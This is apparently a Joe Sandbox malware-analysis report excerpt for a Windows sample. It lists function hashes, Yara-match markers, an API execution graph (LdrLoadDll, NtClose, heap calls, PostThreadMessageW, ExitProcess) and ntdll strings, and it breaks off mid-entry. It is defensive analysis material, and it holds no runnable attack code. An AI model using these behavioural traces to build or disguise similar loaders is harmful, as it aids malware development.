                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42171a2efb3e049ce3313e3e1c35e7da89d88561b03eaeb2c9928226d860c9ae
                                                • Instruction ID: 9a1b9d3bf3cf337cda72bcd1dc12bfc386be7a7f015601f8a430254f19a462f9
                                                • Opcode Fuzzy Hash: 42171a2efb3e049ce3313e3e1c35e7da89d88561b03eaeb2c9928226d860c9ae
                                                • Instruction Fuzzy Hash: AF21FF76604200DFDB14DF24D984B26BBB9FF88314F24C96DE80E4B296C33AD847CA61
                                                Function 0097D006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b54e55c25a7c7661bce2c3eddae9e85dadeb86d27ef8b72457f84c4df04ee5e1
                                                • Instruction ID: d5d832f248483e62033791b520cc62f2fe62e3ce6f2e8e02e3236ea6404464c9
                                                • Opcode Fuzzy Hash: b54e55c25a7c7661bce2c3eddae9e85dadeb86d27ef8b72457f84c4df04ee5e1
                                                • Instruction Fuzzy Hash: 88215E765093808FDB12CF24D994715BF71EF46314F29C5EAD8498F6A7C33A980ACB62
                                                Function 0096D3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696791377.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_96d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: a1957b0018b0249d79be1c9a8d4a92feac3df2c6bf6ff7f54bb3513a666f58a3
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 40110372904240CFDB02CF00D5C4B16BF72FB94324F24C2A9D8090B2A6C33AE85ACBA1
                                                Function 0097D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1696831761.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_97d000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: e48895c9595ec40132838d2eedde596afaab760d95634e57064f5d4673ff7a58
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 12117976504280DFDB16CF14D5C4B15BBB1FB84314F28C6AAD8494B696C33AD84ACB61

                                                Non-executed Functions

                                                Function 00CDD5BC Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c3c57e13e174ae3228ccff79d7a508b46938484065c991c0908978701a47739
                                                • Instruction ID: 81ae24b754cbedd316d49dc2855801300a39d407159792193ec673e67c7c4e7d
                                                • Opcode Fuzzy Hash: 3c3c57e13e174ae3228ccff79d7a508b46938484065c991c0908978701a47739
                                                • Instruction Fuzzy Hash: 0DA15B32E00215CFCF05DFA4C8405AEB7B2FF85300B15857AEA16AB365DB71EA56DB40

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5%
                                                Signature Coverage:7.9%
                                                Total number of Nodes:140
                                                Total number of Limit Nodes:7
                                                execution_graph 93165 424923 93167 424932 93165->93167 93166 424979 93173 42d6c3 93166->93173 93167->93166 93170 4249b7 93167->93170 93172 4249bc 93167->93172 93171 42d6c3 RtlFreeHeap 93170->93171 93171->93172 93176 42bb33 93173->93176 93175 424989 93177 42bb4d 93176->93177 93178 42bb5e RtlFreeHeap 93177->93178 93178->93175 93179 42adc3 93180 42addd 93179->93180 93183 17e2df0 LdrInitializeThunk 93180->93183 93181 42ae05 93183->93181 93184 42e7a3 93185 42e7b3 93184->93185 93186 42e7b9 93184->93186 93189 42d7a3 93186->93189 93188 42e7df 93192 42bae3 93189->93192 93191 42d7be 93191->93188 93193 42bafd 93192->93193 93194 42bb0e RtlAllocateHeap 93193->93194 93194->93191 93307 424593 93308 4245af 93307->93308 93309 4245d7 93308->93309 93310 4245eb 93308->93310 93311 42b7c3 NtClose 93309->93311 93312 42b7c3 NtClose 93310->93312 93313 4245e0 93311->93313 93314 4245f4 93312->93314 93317 42d7e3 RtlAllocateHeap 93314->93317 93316 4245ff 93317->93316 93195 41e343 93196 41e369 93195->93196 93200 41e457 93196->93200 93201 42e8d3 93196->93201 93198 41e3fb 93198->93200 93207 42ae13 93198->93207 93202 42e843 93201->93202 93203 42e8a0 93202->93203 93204 42d7a3 RtlAllocateHeap 93202->93204 93203->93198 93205 42e87d 93204->93205 93206 42d6c3 RtlFreeHeap 93205->93206 93206->93203 93208 42ae2d 93207->93208 93211 17e2c0a 93208->93211 93209 42ae59 93209->93200 93212 17e2c1f LdrInitializeThunk 93211->93212 93213 17e2c11 93211->93213 93212->93209 93213->93209 93214 41b223 93215 41b267 93214->93215 93216 41b288 93215->93216 93218 42b7c3 93215->93218 93219 42b7dd 93218->93219 93220 42b7ee NtClose 93219->93220 93220->93216 93221 414283 93222 414298 93221->93222 93227 417bd3 93222->93227 93224 4142bb 93225 4142f1 PostThreadMessageW 93224->93225 93226 414300 93224->93226 93225->93226 93228 417bf7 93227->93228 93229 417c33 LdrLoadDll 93228->93229 93230 417bfe 93228->93230 93229->93230 93230->93224 93318 411df3 93319 411e05 93318->93319 93324 413fe3 93319->93324 93322 42b7c3 NtClose 93323 411e1e 93322->93323 93326 414009 93324->93326 93325 411e11 93325->93322 93326->93325 93328 413d83 93326->93328 93329 413da5 93328->93329 93331 42ba43 93328->93331 93329->93325 93332 42ba5d 93331->93332 93335 17e2c70 LdrInitializeThunk 93332->93335 93333 42ba85 93333->93329 93335->93333 93231 401a28 93232 401a34 93231->93232 93235 42ec63 93232->93235 93238 42d2b3 93235->93238 93239 42d2d9 93238->93239 93250 407613 93239->93250 93241 42d2ef 93242 401b14 93241->93242 93253 41b033 93241->93253 93244 42d30e 93245 42d323 93244->93245 93268 42bb83 93244->93268 93264 427843 93245->93264 93248 42d332 93249 42bb83 ExitProcess 93248->93249 93249->93242 93271 416903 93250->93271 93252 407620 93252->93241 93254 41b05f 93253->93254 93282 41af23 93254->93282 93257 41b0a4 93260 41b0c0 93257->93260 93262 42b7c3 NtClose 93257->93262 93258 41b08c 93259 41b097 93258->93259 93261 42b7c3 NtClose 93258->93261 93259->93244 93260->93244 93261->93259 93263 41b0b6 93262->93263 93263->93244 93265 42789d 93264->93265 93267 4278aa 93265->93267 93293 418723 93265->93293 93267->93248 93269 42bb9d 93268->93269 93270 42bbae ExitProcess 93269->93270 93270->93245 93272 41691a 93271->93272 93274 416933 93272->93274 93275 42c223 93272->93275 93274->93252 93277 42c23b 93275->93277 93276 42c25f 93276->93274 93277->93276 93278 42ae13 LdrInitializeThunk 93277->93278 93279 42c2b4 93278->93279 93280 42d6c3 RtlFreeHeap 93279->93280 93281 42c2cd 93280->93281 93281->93274 93283 41af3d 93282->93283 93287 41b019 93282->93287 93288 42aeb3 93283->93288 93286 42b7c3 NtClose 93286->93287 93287->93257 93287->93258 93289 42aecd 93288->93289 93292 17e35c0 LdrInitializeThunk 93289->93292 93290 41b00d 93290->93286 93292->93290 93295 41874d 93293->93295 93294 418bbb 93294->93267 93295->93294 93301 413f63 93295->93301 93297 41885a 93297->93294 93298 42d6c3 RtlFreeHeap 93297->93298 93299 418872 93298->93299 93299->93294 93300 42bb83 ExitProcess 93299->93300 93300->93294 93303 413f79 93301->93303 93304 413fdc 93303->93304 93306 41b343 RtlFreeHeap LdrInitializeThunk 93303->93306 93304->93297 93305 413fd4 93305->93297 93306->93305 93336 418dd8 93337 42b7c3 NtClose 93336->93337 93338 418de2 93337->93338 93339 17e2b60 LdrInitializeThunk

                                                Executed Functions

                                                Function 00417BD3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 417bd3-417bef 255 417bf7-417bfc 254->255 256 417bf2 call 42e3c3 254->256 257 417c02-417c10 call 42e8e3 255->257 258 417bfe-417c01 255->258 256->255 261 417c20-417c31 call 42cd83 257->261 262 417c12-417c1d call 42eb83 257->262 267 417c33-417c47 LdrLoadDll 261->267 268 417c4a-417c4d 261->268 262->261 267->268
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C45
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction ID: 3399c8b729abe5c50f2b1dd34d5db3ba51e5c2a799b59b459bd5f853664e658c
                                                • Opcode Fuzzy Hash: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction Fuzzy Hash: 130121B5E4020DABDF10DBE5DC42FDEB7789B54308F0041AAF90897241F635EB558B95
                                                Function 0042B7C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 280 42b7c3-42b7fc call 404a13 call 42c883 NtClose
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction ID: c47839424810816a31de3731444692d7f77b3233c2a3b7b3da474825dc8ccde1
                                                • Opcode Fuzzy Hash: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction Fuzzy Hash: 1BE04F31244214BBD620EA6AEC41FDBB75CDFC5754F50801AFA08A7182C6707A0187E4
                                                Function 017E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                Function 017E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                Function 017E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                Function 017E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3
                                                Function 0041427B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 004142FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: 151592a9bd86819ff3a3a78173e0d24c6851f0672d5fe8d4bad98e26acc60452
                                                • Instruction ID: 88c72495a188172b1c6da3ec2a0e06e5bb97c01245be6291e86e2bd9bf65eac2
                                                • Opcode Fuzzy Hash: 151592a9bd86819ff3a3a78173e0d24c6851f0672d5fe8d4bad98e26acc60452
                                                • Instruction Fuzzy Hash: C411E5B1D0021C7AEB00AAA19C82DEFBB7C9F817D8F44806AFE1477141D67C4E468BB5
                                                Function 00414283 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 004142FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: ec5c199d7cb316c84c2f9b0819a67f1b4511786be5bca7aba1065107264afd37
                                                • Instruction ID: d8351696ff161fa62588335948016de532a7d8a00b7df5912158028786ccdff3
                                                • Opcode Fuzzy Hash: ec5c199d7cb316c84c2f9b0819a67f1b4511786be5bca7aba1065107264afd37
                                                • Instruction Fuzzy Hash: 9201DBB1D0011C7ADB10AAE19C81DEFBB7CDF80798F44806AFE1467141D67C4E064BB5
                                                Function 0042BAE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 270 42bae3-42bb24 call 404a13 call 42c883 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E3FB,?,?,00000000,?,0041E3FB,?,?,?), ref: 0042BB1F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction ID: 05e5b9f589b9c42f5e83a9554efb67e958f0674f352e2ac4cbb69bf8c1d25a3b
                                                • Opcode Fuzzy Hash: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction Fuzzy Hash: 78E0ED716442187BDA14EE99EC41FDB77ADEFC5714F404419F908A7282D670BA118BB8
                                                Function 0042BB33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 275 42bb33-42bb74 call 404a13 call 42c883 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,BC8D9489,00000007,00000000,00000004,00000000,004174AD,000000F4,?,?,?,?,?), ref: 0042BB6F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction ID: e551e9f2b78c561caaee8950cf8420899f30717f74a5d320ebcd83fc6cba48be
                                                • Opcode Fuzzy Hash: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction Fuzzy Hash: 65E06DB12006087BD614EE99EC41FDB77ADEFC4714F408019FA08A7282C670B9118BF8
                                                Function 0042BB83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 285 42bb83-42bbbc call 404a13 call 42c883 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,7F0D1D20,?,?,7F0D1D20), ref: 0042BBB7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_jlsvOH1c8bSRKqM.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: a05d517074970ad952adf01fc58b4a8a2ccc6c61a80cba6756ea391c7ee59bad
                                                • Instruction ID: af9b54458622120affa70d97448482ff79e9ec708bfe6d2fd62958871ffb0ded
                                                • Opcode Fuzzy Hash: a05d517074970ad952adf01fc58b4a8a2ccc6c61a80cba6756ea391c7ee59bad
                                                • Instruction Fuzzy Hash: 56E04F316402187BD624EA5ADC41FDB775DDFC5710F004419FA0867182C6B479418BE4
                                                Function 017E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276

                                                Non-executed Functions

                                                Function 01822349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                Function 017D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                • undeleted critical section in freed memory, xrefs: 0181542B
                                                • double initialized or corrupted critical section, xrefs: 01815508
                                                • Thread identifier, xrefs: 0181553A
                                                • Invalid debug info address of this critical section, xrefs: 018154B6
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                • 8, xrefs: 018152E3
                                                • corrupted critical section, xrefs: 018154C2
                                                • Critical section address., xrefs: 01815502
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                Function 017D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                • @, xrefs: 0181259B
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                Function 01848B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
